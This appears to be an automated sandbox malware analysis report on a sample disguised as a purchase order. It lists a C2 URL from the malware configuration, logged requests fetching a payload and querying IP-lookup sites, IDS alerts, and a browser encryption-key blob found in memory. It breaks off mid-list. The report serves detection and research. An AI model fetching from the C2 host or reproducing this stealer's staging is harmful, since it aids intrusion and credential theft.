                          Source: Binary string: easinvoker.pdbGCTL source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C10000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954746218.0000000021C19000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954746218.0000000021C48000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000003.23057348047.000000000082A000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000003.23057348047.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020C5D000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23136430949.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23136430949.00000000007C3000.00000004.00000020.00020000.00000000.sdmp
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DD58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02DD58B4
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 02B07394h5_2_02B07188
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 02B077E4h5_2_02B07590
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h5_2_02B07E60
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 02B077E4h5_2_02B07580
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h5_2_02B07E58
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 00EA9731h6_2_00EA9480
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 00EA9E5Ah6_2_00EA9A30
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 00EA9E5Ah6_2_00EA9D87
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 0521873Bh6_2_05218400
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 0521799Fh6_2_052176F8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 0521A3A7h6_2_0521A100
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 0521969Fh6_2_052193F8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05217547h6_2_052172A0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05219F4Fh6_2_05219CA8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05219247h6_2_05218FA0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 0521824Fh6_2_05217FA8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 052170EFh6_2_05216E48
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05219AF7h6_2_05219850
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05218DEFh6_2_05218B48
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 05217DF7h6_2_05217B50
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then mov esp, ebp6_2_05216BB0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then mov esp, ebp6_2_05216BC0

                          Networking

                          barindex
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: https://lwaziacademy.com/wps/200_Oupzhkprnvw
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DEE2F0 InternetCheckConnectionA,0_2_02DEE2F0
                          Source: global trafficHTTP traffic detected: GET /xml/102.129.153.238 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                          Source: Joe Sandbox ViewASN Name: GridhostZA GridhostZA
                          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: unknownDNS query: name: checkip.dyndns.org
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49747 -> 41.185.8.252:443
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49748 -> 132.226.8.169:80
                          Source: global trafficHTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49749 version: TLS 1.0
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                          Source: global trafficHTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
                          Source: global trafficHTTP traffic detected: GET /xml/102.129.153.238 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
                          Source: global trafficDNS traffic detected: DNS query: lwaziacademy.com
                          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                          Source: Microsofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.drString found in binary or memory: http://checkip.dyndns.org/q
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24170624386.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23004693323.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                          Source: PO_B2W984.com, 00000000.00000003.22961850687.0000000022891000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962642028.000000007E75A000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000002.23155674229.0000000020D19000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24170624386.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23004693323.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                          Source: powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, 